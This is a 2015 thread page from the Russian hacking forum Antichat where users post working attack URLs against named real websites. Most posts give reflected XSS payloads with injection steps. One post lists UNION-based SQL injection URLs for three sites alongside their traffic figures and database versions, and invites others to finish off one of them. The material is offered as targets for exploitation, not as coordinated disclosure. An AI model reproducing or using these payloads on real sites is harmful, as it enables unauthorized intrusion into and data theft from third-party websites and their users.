HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #181  
Старый 15.09.2015, 07:27
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Ссылкаnlinetrade.ru

Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .


Код:
Code:
www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2fscript%253E&c=399581">alert("WH")>
 
Ответить с цитированием

  #182  
Старый 15.09.2015, 07:42
SaNDER
Guest
Сообщений: n/a
Провел на форуме:
51198

Репутация: 3
По умолчанию

Ссылка: patee.ru

Тип:XSS-Reflected

Код:
Code:
">alert("WH")
Регистрируемся,создаем рецепт

Вбиваем в "Названии блюда" "Описание блюда" скрипт и ещё в "Стадия приготовления"

Там где число пропорции пишем любое число(только не сильно большое)

"Время приготовления в минутах " так же .

Не забудьте добавить ингредиенты(!),любые на рандом(я выбирал 4 штуки) .

После отправляем и видим XSS-Reflected .
 
Ответить с цитированием

  #183  
Старый 15.09.2015, 11:01
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию

Цитата:
Сообщение от SaNDER  
SaNDER said:

Ссылкаnlinetrade.ru

Тип: Полу-активная,действует некоторое время,потом надо снова вбивать урл со скриптом .

Код:
Code:
www.onlinetrade.ru/member/login?url=%2522%253E%253Cscript%253Ealert()%253C%2fscript%253E&c=399581">alert("WH")>

разберитесь с определениями.
 
Ответить с цитированием

  #184  
Старый 16.09.2015, 20:22
tipa_cracker
Guest
Сообщений: n/a
Провел на форуме:
1993

Репутация: 0
По умолчанию

 
Ответить с цитированием

  #185  
Старый 19.09.2015, 01:51
DDShadoww
Guest
Сообщений: n/a
Провел на форуме:
2236

Репутация: 2
По умолчанию

Target: alfa.com.tw

Type: XSS Reflected

Код:
Code:
http://www.alfa.com.tw/search.php?keyword=">alert(1)
А для Safari, Chrome работает iframe если будет присутствовать закрывающий тэг.
 
Ответить с цитированием

  #186  
Старый 19.09.2015, 13:03
Filipp
Guest
Сообщений: n/a
Провел на форуме:
98300

Репутация: 31
По умолчанию

XSS-reflected:

Код:
Code:
www.topglobus.ru/sachy/ridici/sachy-hra2.php?id=4181471&pozz=4'%22()%26%25prompt(935766)
 
Ответить с цитированием

  #187  
Старый 20.09.2015, 18:39
joelblack
Guest
Сообщений: n/a
Провел на форуме:
70303

Репутация: 145
По умолчанию

target: http://www.unifinbank.ru/

type: XSS Reflected


Строка поиска:

Код:
Code:
">alert('hello')
 
Ответить с цитированием

  #188  
Старый 22.09.2015, 20:07
R3hab
Guest
Сообщений: n/a
Провел на форуме:
31545

Репутация: 6
По умолчанию

STREIT Group - Armored Cars Manufacturer

Код HTML:
HTML:
http://www.armored-cars.com/vehicle/view_add.php?vid=-7%20/*!50000union*/%20distinct%20select%201,2,3,4,5,version(),7,8,9
[COLOR="rgb(0, 255, 255)"]ТИЦ 30[/COLOR]

PR 3

AR 969,040


[COLOR="rgb(0, 255, 255)"]5.5.42-MariaDB-cll-lve
[/COLOR]


Make Free Bitcoin

Код HTML:
HTML:
http://www.makefreebitco.in/news.php?id=-5'%20/*!50000union*/%20distinct%20select%201,version(),3,4--+f


AR 149,492

5.5.42-37.1


Трафф 140K


SMS PARIAZ - Accueil

Joomla кому надо,добьет

Код HTML:
HTML:
http://www.smspariaz.com/race/turf2.php?mid=-7%20union%20select%201,2,version(),4,5,6,7,8,9,10,11,12--+f


PR 2

AR 322,679

5.6.23

Трафф 120K

 
Ответить с цитированием

  #189  
Старый 22.09.2015, 21:42
DDShadoww
Guest
Сообщений: n/a
Провел на форуме:
2236

Репутация: 2
По умолчанию

Target:220-volt.ru

Type:XSS Reflected

Код:
Code:
www.220-volt.ru/search/?q=confirm(1)
 
Ответить с цитированием

  #190  
Старый 25.09.2015, 07:34
tipa_cracker
Guest
Сообщений: n/a
Провел на форуме:
1993

Репутация: 0
По умолчанию

Мне кажется что тут ( http://www.girlplays.ru/ ) уязвимости в поисковике 0 ...
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ